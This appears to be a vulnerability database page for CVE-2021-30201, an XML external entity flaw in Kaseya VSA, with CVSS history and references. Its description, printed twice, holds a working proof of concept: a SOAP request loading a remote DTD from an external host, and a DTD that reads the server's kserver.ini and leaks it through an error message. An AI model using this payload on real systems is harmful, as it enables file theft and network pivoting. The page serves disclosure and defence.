CVE-2021-30201

The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:kas="KaseyaWS"> <soapenv:Header/> <soapenv:Body> <kas:PrimitiveResetPassword> <!--type: string--> <kas:XmlRequest><![CDATA[<!DOCTYPE data SYSTEM "http://192.168.1.170:8080/oob.dtd"><data>&send;</data>]]> </kas:XmlRequest> </kas:PrimitiveResetPassword> </soapenv:Body> </soapenv:Envelope> ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` <!ENTITY % file SYSTEM "file://c:\\kaseya\\kserver\\kserver.ini"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\kaseya\\kserver\\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><soap:Fault><faultcode>soap:Server</faultcode><faultstring>Server was unable to process request. ---&gt; There is an error in XML document (24, -1000).\r\n\r\nSystem.Xml.XmlException: Fragment identifier '######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## <snip> ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network.
Configurations

Configuration 1 (hide)

cpe:2.3:a:kaseya:vsa:*:*:*:*:-:*:*:*

History

29 Apr 2022, 18:14

Type Values Removed Values Added
CVSS v2 : 4.0
v3 : 6.5
v2 : 5.0
v3 : 7.5
References (MISC) https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/ - Third Party Advisory (MISC) https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/ - Patch, Third Party Advisory
References (CONFIRM) https://csirt.divd.nl/DIVD-2021-00011 - Third Party Advisory (CONFIRM) https://csirt.divd.nl/DIVD-2021-00011 - Patch, Third Party Advisory
References (CONFIRM) https://csirt.divd.nl/CVE-2021-30201 - Third Party Advisory (CONFIRM) https://csirt.divd.nl/CVE-2021-30201 - Exploit, Third Party Advisory

04 Apr 2022, 07:15

Type Values Removed Values Added
Summary An XML External Entity (XXE) issue exists in Kaseya VSA before 9.5.6. The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:kas="KaseyaWS"> <soapenv:Header/> <soapenv:Body> <kas:PrimitiveResetPassword> <!--type: string--> <kas:XmlRequest><![CDATA[<!DOCTYPE data SYSTEM "http://192.168.1.170:8080/oob.dtd"><data>&send;</data>]]> </kas:XmlRequest> </kas:PrimitiveResetPassword> </soapenv:Body> </soapenv:Envelope> ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` <!ENTITY % file SYSTEM "file://c:\\kaseya\\kserver\\kserver.ini"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\kaseya\\kserver\\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><soap:Fault><faultcode>soap:Server</faultcode><faultstring>Server was unable to process request. ---&gt; There is an error in XML document (24, -1000).\r\n\r\nSystem.Xml.XmlException: Fragment identifier '######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## <snip> ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network.

01 Mar 2022, 18:51

Type Values Removed Values Added
CVSS v2 : 6.5
v3 : 8.8
v2 : 4.0
v3 : 6.5
References (CONFIRM) https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021 - (CONFIRM) https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021 - Release Notes, Vendor Advisory
References (CONFIRM) https://csirt.divd.nl/DIVD-2021-00011 - (CONFIRM) https://csirt.divd.nl/DIVD-2021-00011 - Third Party Advisory
References (CONFIRM) https://csirt.divd.nl/CVE-2021-30201 - (CONFIRM) https://csirt.divd.nl/CVE-2021-30201 - Third Party Advisory

07 Feb 2022, 16:15

Type Values Removed Values Added
References
  • (CONFIRM) https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021 -
  • (CONFIRM) https://csirt.divd.nl/DIVD-2021-00011 -
  • (CONFIRM) https://csirt.divd.nl/CVE-2021-30201 -

12 Jul 2021, 16:42

Type Values Removed Values Added
CPE cpe:2.3:a:kaseya:vsa:*:*:*:*:-:*:*:*
CVSS v2 : unknown
v3 : unknown
v2 : 6.5
v3 : 8.8
References (MISC) https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/ - (MISC) https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/ - Third Party Advisory
CWE CWE-611

09 Jul 2021, 15:01

Type Values Removed Values Added
New CVE

Information

Published : 2021-07-09 14:15

Updated : 2023-12-10 13:55


NVD link : CVE-2021-30201

Mitre link : CVE-2021-30201

CVE.ORG link : CVE-2021-30201


JSON object : View

Products Affected

kaseya

  • vsa
CWE
CWE-611

Improper Restriction of XML External Entity Reference